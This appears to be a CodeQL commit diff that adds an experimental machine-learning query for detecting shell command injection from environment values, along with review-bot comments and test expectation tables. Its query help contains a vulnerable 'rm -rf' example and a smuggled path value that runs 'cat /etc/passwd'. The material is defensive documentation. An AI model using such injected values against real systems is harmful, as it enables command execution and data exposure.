Merge branch 'main' into js-use-shared-cryptography

Alex Ford
2023-02-03 15:18:30 +00:00
committed by GitHub
858 changed files with 237441 additions and 19245 deletions


@@ -278,6 +278,28 @@ private class NosqlInjectionSinkCharacteristic extends EndpointCharacteristic {
}
}
/**
* Endpoints identified as "ShellCommandInjectionFromEnvironmentSink" by the standard JavaScript libraries are
* ShellCommandInjectionFromEnvironment sinks with maximal confidence.
*/
private class ShellCommandInjectionFromEnvironmentSinkCharacteristic extends EndpointCharacteristic {
ShellCommandInjectionFromEnvironmentSinkCharacteristic() {
this = "ShellCommandInjectionFromEnvironmentSink"
}
override predicate appliesToEndpoint(DataFlow::Node n) {
n instanceof ShellCommandInjectionFromEnvironment::Sink
}
override predicate hasImplications(
EndpointType endpointClass, boolean isPositiveIndicator, float confidence
) {
endpointClass instanceof ShellCommandInjectionFromEnvironmentSinkType and
isPositiveIndicator = true and
confidence = maximalConfidence()
}
}
/*
* Characteristics that are indicative of not being a sink of any type, and have historically been used to select
* negative samples for training.


@@ -10,7 +10,8 @@ newtype TEndpointType =
TXssSinkType() or
TNosqlInjectionSinkType() or
TSqlInjectionSinkType() or
TTaintedPathSinkType()
TTaintedPathSinkType() or
TShellCommandInjectionFromEnvironmentSinkType()
/** A class that can be predicted by endpoint scoring models. */
abstract class EndpointType extends TEndpointType {
@@ -60,3 +61,11 @@ class TaintedPathSinkType extends EndpointType, TTaintedPathSinkType {
override int getEncoding() { result = 4 }
}
/** The `ShellCommandInjectionFromEnvironmentSink` class that can be predicted by endpoint scoring models. */
class ShellCommandInjectionFromEnvironmentSinkType extends EndpointType,
TShellCommandInjectionFromEnvironmentSinkType {
override string getDescription() { result = "ShellCommandInjectionFromEnvironmentSink" }
override int getEncoding() { result = 5 }
}
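Review bot: `override int getEncoding() { result = 5 }` on the new `ShellCommandInjectionFromEnvironmentSinkType` introduces a bare literal with nothing recording that the value must be unique among `EndpointType` subclasses and must never be renumbered; elsewhere in this commit the encoding is emitted as the training label (`select queryName, e.getEncoding() as label`), so a collision with an existing encoding or a later renumbering would silently mislabel data without any compile-time failure. A comment on the override, or better on the abstract declaration, would guard against that: `// Encoding is used as the model label: keep unique across EndpointType subclasses and never renumber.` The abstract `EndpointType` class opened in the first hunk continues outside the hunk, so I cannot see whether such a note already exists there.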


@@ -0,0 +1,30 @@
/**
* For internal use only.
*
* A taint-tracking configuration for reasoning about command-injection
* vulnerabilities.
* Defines shared code used by the ShellCommandInjectionFromEnvironment boosted query.
*/
private import semmle.javascript.heuristics.SyntacticHeuristics
private import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentCustomizations::ShellCommandInjectionFromEnvironment as ShellCommandInjectionFromEnvironment
import AdaptiveThreatModeling
class ShellCommandInjectionFromEnvironmentAtmConfig extends AtmConfig {
ShellCommandInjectionFromEnvironmentAtmConfig() {
this = "ShellCommandInjectionFromEnvironmentAtmConfig"
}
override predicate isKnownSource(DataFlow::Node source) {
source instanceof ShellCommandInjectionFromEnvironment::Source
}
override EndpointType getASinkEndpointType() {
result instanceof ShellCommandInjectionFromEnvironmentSinkType
}
override predicate isSanitizer(DataFlow::Node node) {
super.isSanitizer(node) or
node instanceof ShellCommandInjectionFromEnvironment::Sanitizer
}
}
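Review bot: The `private import semmle.javascript.heuristics.SyntacticHeuristics` near the top of the new file is not referenced by anything in `ShellCommandInjectionFromEnvironmentAtmConfig`, and since the hunk is the whole 30-line file it looks like a leftover from the ATM configuration this one was copied from; drop it unless a follow-up needs it. The class itself carries no QLDoc even though the module header does; a one-liner above the class line along the lines of "The ATM configuration for the ShellCommandInjectionFromEnvironment boosted query: known sources and sanitizers are taken from the standard-library customizations, sinks are predicted via ShellCommandInjectionFromEnvironmentSinkType" would tell a reader how the three overrides fit together. The `isSanitizer` override keeps `super.isSanitizer(node)` in the disjunction rather than replacing it, which is the right shape for an ATM config and worth preserving if the class is reworked.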


@@ -1,6 +1,6 @@
name: codeql/javascript-experimental-atm-lib
description: CodeQL libraries for the experimental ML-powered queries
version: 0.4.6
version: 0.4.7
extractor: javascript
library: true
groups:


@@ -17,6 +17,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti
private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
private import experimental.adaptivethreatmodeling.XssATM as XssAtm
private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
string getAReasonSinkExcluded(DataFlow::Node sinkCandidate, Query query) {
query instanceof NosqlInjectionQuery and
@@ -33,6 +34,11 @@ string getAReasonSinkExcluded(DataFlow::Node sinkCandidate, Query query) {
or
query instanceof XssThroughDomQuery and
result = any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(sinkCandidate)
or
query instanceof ShellCommandInjectionFromEnvironmentQuery and
result =
any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg)
.getAReasonSinkExcluded(sinkCandidate)
}
pragma[inline]


@@ -15,6 +15,7 @@ private import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjecti
private import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
private import experimental.adaptivethreatmodeling.XssATM as XssAtm
private import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
private import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
/**
* Gets the set of featureName-featureValue pairs for each endpoint in the training set.
@@ -217,6 +218,10 @@ DataFlow::Configuration getDataFlowCfg(Query query) {
query instanceof XssQuery and result instanceof XssAtm::DomBasedXssAtmConfig
or
query instanceof XssThroughDomQuery and result instanceof XssThroughDomAtm::XssThroughDomAtmConfig
or
query instanceof ShellCommandInjectionFromEnvironmentQuery and
result instanceof
ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig
}
// TODO: Delete this once we are no longer surfacing `hasFlowFromSource`.


@@ -9,6 +9,7 @@ import experimental.adaptivethreatmodeling.NosqlInjectionATM as NosqlInjectionAt
import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
import experimental.adaptivethreatmodeling.XssATM as XssAtm
import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
import experimental.adaptivethreatmodeling.AdaptiveThreatModeling
from string queryName, AtmConfig c, EndpointType e
@@ -26,6 +27,10 @@ where
queryName = "Xss" and c instanceof XssAtm::DomBasedXssAtmConfig
or
queryName = "XssThroughDom" and c instanceof XssThroughDomAtm::XssThroughDomAtmConfig
or
queryName = "ShellCommandInjectionFromEnvironment" and
c instanceof
ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig
) and
e = c.getASinkEndpointType()
select queryName, e.getEncoding() as label


@@ -9,7 +9,8 @@ newtype TQuery =
TSqlInjectionQuery() or
TTaintedPathQuery() or
TXssQuery() or
TXssThroughDomQuery()
TXssThroughDomQuery() or
TShellCommandInjectionFromEnvironmentQuery()
abstract class Query extends TQuery {
abstract string getName();
@@ -36,3 +37,8 @@ class XssQuery extends Query, TXssQuery {
class XssThroughDomQuery extends Query, TXssThroughDomQuery {
override string getName() { result = "XssThroughDom" }
}
class ShellCommandInjectionFromEnvironmentQuery extends Query,
TShellCommandInjectionFromEnvironmentQuery {
override string getName() { result = "ShellCommandInjectionFromEnvironment" }
}
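Review bot: Adding `TShellCommandInjectionFromEnvironmentQuery()` to the `TQuery` newtype required matching edits in at least four dispatch sites that this commit also touches (`getAReasonSinkExcluded`, `getDataFlowCfg`, the `queryName`/`label` select, and `tokenFeatures`) plus `TEndpointType`, yet nothing at the newtype tells the next author so; a missed site would not fail compilation, it would just leave the new query without sink exclusions or features. Suggest a comment above the `newtype TQuery =` line: `// When adding a query here, also add it to TEndpointType and to every per-query dispatch (getAReasonSinkExcluded, getDataFlowCfg, tokenFeatures, and the label-extraction query).` The `newtype TQuery =` declaration begins before the first hunk, so the comment would sit outside the lines shown here.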


@@ -0,0 +1,75 @@
# Shell command built from environment values (experimental)
Dynamically constructing a shell command with values from the
local environment, such as file paths, may inadvertently
change the meaning of the shell command.
Such changes can occur when an environment value contains
characters that the shell interprets in a special way, for instance
quotes and spaces.
This can result in the shell command misbehaving, or even
allowing a malicious user to execute arbitrary commands on the system.
Note: This CodeQL query is an experimental query. Experimental queries generate alerts using machine learning. They might include more false positives but they will improve over time.
## Recommendation
If possible, use hard-coded string literals to specify the
shell command to run, and provide the dynamic arguments to the shell
command separately to avoid interpretation by the shell.
Alternatively, if the shell command must be constructed
dynamically, then add code to ensure that special characters in
environment values do not alter the shell command unexpectedly.
## Example
The following example shows a dynamically constructed shell
command that recursively removes a temporary directory that is located
next to the currently executing JavaScript file. Such utilities are
often found in custom build scripts.
```javascript
var cp = require("child_process"),
path = require("path");
function cleanupTemp() {
let cmd = "rm -rf " + path.join(__dirname, "temp");
cp.execSync(cmd); // BAD
}
```
The shell command will, however, fail to work as intended if the
absolute path of the script's directory contains spaces. In that
case, the shell command will interpret the absolute path as multiple
paths, instead of a single path.
For instance, if the absolute path of
the temporary directory is "`/home/username/important project/temp`", then the shell command will recursively delete
`"/home/username/important"` and `"project/temp"`,
where the latter path gets resolved relative to the working directory
of the JavaScript process.
Even worse, although less likely, a malicious user could
provide the path `"/home/username/; cat /etc/passwd #/important
project/temp"` in order to execute the command `"cat
/etc/passwd"`.
To avoid such potentially catastrophic behaviors, provide the
directory as an argument that does not get interpreted by a
shell:
```javascript
var cp = require("child_process"),
path = require("path");
function cleanupTemp() {
let cmd = "rm",
args = ["-rf", path.join(__dirname, "temp")];
cp.execFileSync(cmd, args); // GOOD
}
```
## References
* OWASP: [Command Injection](https://www.owasp.org/index.php/Command_Injection)


@@ -0,0 +1,29 @@
/**
* For internal use only.
*
* @name Shell command built from environment values
* @description Building a shell command string with values from the enclosing
* environment may cause subtle bugs or vulnerabilities.
* @kind path-problem
* @scored
* @problem.severity warning
* @security-severity 6.3
* @precision high
* @id js/ml-powered/shell-command-injection-from-environment
* @tags experimental security
* correctness
* security
* external/cwe/cwe-078
* external/cwe/cwe-088
*/
import javascript
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM
import ATM::ResultsInfo
import DataFlow::PathGraph
from AtmConfig cfg, DataFlow::PathNode source, DataFlow::PathNode sink, float score
where cfg.hasBoostedFlowPath(source, sink, score)
select sink.getNode(), source, sink,
"(Experimental) This shell command depends on $@. Identified using machine learning.",
source.getNode(), "an uncontrolled value", score
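Review bot: The `@tags` block of the new query lists `security` twice, once on the `@tags experimental security` line and again on its own line after `correctness`, so one occurrence should go; keeping `@tags experimental`, then `correctness`, `security`, `external/cwe/cwe-078`, `external/cwe/cwe-088` on the continuation lines reads cleanest. `@precision high` on an experimental, ML-scored query is also worth a second look: the other ML-powered queries in this pack presumably use the same value, so confirm it matches them rather than the non-ML counterpart, since the `@scored` results are ranked by `score` and the `@description` itself hedges with "may cause subtle bugs or vulnerabilities".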


@@ -0,0 +1,48 @@
# DOM text reinterpreted as HTML (experimental)
Extracting text from a DOM node and interpreting it as HTML can lead to a cross-site scripting vulnerability.
A webpage with this vulnerability reads text from the DOM, and afterwards adds the text as HTML to the DOM. Using text from the DOM as HTML effectively unescapes the text, and thereby invalidates any escaping done on the text. If an attacker is able to control the safe sanitized text, then this vulnerability can be exploited to perform a cross-site scripting attack.
Note: This CodeQL query is an experimental query. Experimental queries generate alerts using machine learning. They might include more false positives but they will improve over time.
## Recommendation
To guard against cross-site scripting, consider using contextual output encoding/escaping before writing text to the page, or one of the other solutions that are mentioned in the References section below.
## Example
The following example shows a webpage using a `data-target` attribute
to select and manipulate a DOM element using the JQuery library. In the example, the
`data-target` attribute is read into the `target` variable, and the
`$` function is then supposed to use the `target` variable as a CSS
selector to determine which element should be manipulated.
```javascript
$("button").click(function () {
var target = $(this).attr("data-target");
$(target).hide();
});
```
However, if an attacker can control the `data-target` attribute,
then the value of `target` can be used to cause the `$` function
to execute arbitrary JavaScript.
The above vulnerability can be fixed by using `$.find` instead of `$`.
The `$.find` function will only interpret `target` as a CSS selector
and never as HTML, thereby preventing an XSS attack.
```javascript
$("button").click(function () {
var target = $(this).attr("data-target");
$.find(target).hide();
});
```
## References
* OWASP: [DOM based XSS Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html)
* OWASP: [(Cross Site Scripting) Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
* OWASP [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS)
* OWASP [Types of Cross-Site Scripting](https://owasp.org/www-community/Types_of_Cross-Site_Scripting)
* Wikipedia: [Cross-site scripting](http://en.wikipedia.org/wiki/Cross-site_scripting)


@@ -1,7 +1,7 @@
name: codeql/javascript-experimental-atm-queries
description: Experimental ML-powered queries for JavaScript
language: javascript
version: 0.4.6
version: 0.4.7
suites: codeql-suites
defaultSuiteFile: codeql-suites/javascript-atm-code-scanning.qls
groups:


@@ -12,6 +12,7 @@ import experimental.adaptivethreatmodeling.SqlInjectionATM as SqlInjectionAtm
import experimental.adaptivethreatmodeling.TaintedPathATM as TaintedPathAtm
import experimental.adaptivethreatmodeling.XssATM as XssAtm
import experimental.adaptivethreatmodeling.XssThroughDomATM as XssThroughDomAtm
import experimental.adaptivethreatmodeling.ShellCommandInjectionFromEnvironmentATM as ShellCommandInjectionFromEnvironmentAtm
import experimental.adaptivethreatmodeling.EndpointFeatures as EndpointFeatures
import extraction.NoFeaturizationRestrictionsConfig
private import experimental.adaptivethreatmodeling.EndpointCharacteristics as EndpointCharacteristics
@@ -23,6 +24,10 @@ query predicate tokenFeatures(DataFlow::Node endpoint, string featureName, strin
not exists(any(TaintedPathAtm::TaintedPathAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or
not exists(any(XssAtm::DomBasedXssAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or
not exists(any(XssThroughDomAtm::XssThroughDomAtmConfig cfg).getAReasonSinkExcluded(endpoint)) or
not exists(
any(ShellCommandInjectionFromEnvironmentAtm::ShellCommandInjectionFromEnvironmentAtmConfig cfg)
.getAReasonSinkExcluded(endpoint)
) or
any(EndpointCharacteristics::IsArgumentToModeledFunctionCharacteristic characteristic)
.appliesToEndpoint(endpoint)
) and


@@ -23,6 +23,26 @@
| DomBasedXssAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:55:13:55:27 | req.params.name |
| DomBasedXssAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key |
| DomBasedXssAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/tst3.js:16:23:16:41 | req.params.category |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:28:28:28:30 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:29:33:29:35 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:30:26:30:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:31:26:31:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:32:26:32:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:39:26:39:28 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh2.js:10:40:10:46 | command |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:44:15:50 | command |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:44:34:46 | cmd |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:7:33:7:38 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:9:29:9:34 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:20:35:20:40 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:26:35:26:40 | remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:31:27:31:40 | req.query.args |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:40:28:40:43 | req.query.remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:42:31:42:46 | req.query.remote |
| DomBasedXssAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/SecondOrderCommandInjection/second-order.js:46:34:46:49 | req.query.remote |
| DomBasedXssAtmConfig | autogenerated/TaintedPath/handlebars.js:29:46:29:60 | req.params.path |
| DomBasedXssAtmConfig | autogenerated/TaintedPath/handlebars.js:33:42:33:56 | req.params.name |
| DomBasedXssAtmConfig | autogenerated/TaintedPath/handlebars.js:37:43:37:57 | req.params.name |
@@ -137,6 +157,9 @@
| NosqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/mongooseJsonParse.js:19:19:19:20 | {} |
| NosqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/pg-promise.js:6:15:7:55 | "SELECT ... PRICE" |
| NosqlInjectionAtmConfig | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key |
| NosqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:85:37:85:54 | req.query.fileName |
| NosqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:33:12:33:69 | "http:/ ... ry.user |
| NosqlInjectionAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/other.js:34:33:34:48 | { command: cmd } |
| NosqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:29:38:29:62 | { path: ... .path } |
| NosqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:33:34:33:58 | { name: ... .name } |
| NosqlInjectionAtmConfig | autogenerated/TaintedPath/handlebars.js:37:35:37:59 | { name: ... .name } |
@@ -191,6 +214,114 @@
| NosqlInjectionAtmConfig | autogenerated/Xss/ReflectedXss/partial.js:13:42:13:48 | req.url |
| NosqlInjectionAtmConfig | autogenerated/Xss/ReflectedXss/partial.js:40:42:40:50 | [req.url] |
| NosqlInjectionAtmConfig | autogenerated/Xss/ReflectedXss/partial.js:49:38:49:44 | req.url |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:5:33:5:60 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:6:26:6:53 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:117:7:117:44 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:117:14:117:44 | fs.real ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:122:7:122:10 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:122:7:122:21 | path.startsWith |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:236:7:236:47 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:236:14:236:47 | pathMod ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:242:7:242:10 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:242:7:242:20 | path.substring |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:242:7:242:40 | path.su ... length) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:247:7:247:10 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:247:7:247:16 | path.slice |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:247:7:247:36 | path.sl ... length) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:254:7:254:47 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:254:14:254:47 | pathMod ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:260:7:260:56 | relative |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:260:18:260:56 | pathMod ... , path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:261:6:261:13 | relative |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:261:6:261:24 | relative.startsWith |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:261:52:261:59 | relative |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:267:7:267:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:267:17:267:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:268:7:268:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:268:22:268:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:269:7:269:18 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:275:7:275:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:275:17:275:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:276:7:276:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:276:22:276:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:277:7:277:18 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:283:7:283:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:283:17:283:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:284:7:284:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:284:22:284:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:285:7:285:40 | pathMod ... vePath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:291:7:291:42 | newpath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:291:17:291:42 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:292:7:292:85 | relativePath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:292:22:292:85 | pathMod ... ewpath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:293:7:293:40 | pathMod ... vePath) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:339:6:339:46 | path |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:339:13:339:46 | pathMod ... y.path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:343:6:343:35 | abs |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:343:12:343:35 | pathMod ... e(path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:345:6:345:8 | abs |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:352:5:352:12 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:352:5:352:28 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:352:16:352:28 | process.cwd() |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:353:33:353:32 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:358:7:358:51 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:358:21:358:51 | pathMod ... , path) |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetP ... ootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:362:5:362:25 | targetPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:362:18:362:25 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:368:3:368:3 | targetPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:22:370:32 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:370:35:370:42 | rootPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/normalizedPaths.js:371:12:371:22 | requestPath |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-require.js:14:43:14:51 | __dirname |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:20:7:20:33 | homeDir |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:20:17:20:33 | path.resolve('.') |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:22 | homeDir |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:21:16:21:33 | homeDir + '/data/' |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/TaintedPath/tainted-sendFile.js:27:16:27:22 | homeDir |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:7:43:7:48 | files1 |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:17:5:23:5 | return of function format |
| ShellCommandInjectionFromEnvironmentAtmConfig | autogenerated/Xss/StoredXss/xss-through-filenames.js:17:21:17:26 | files2 |
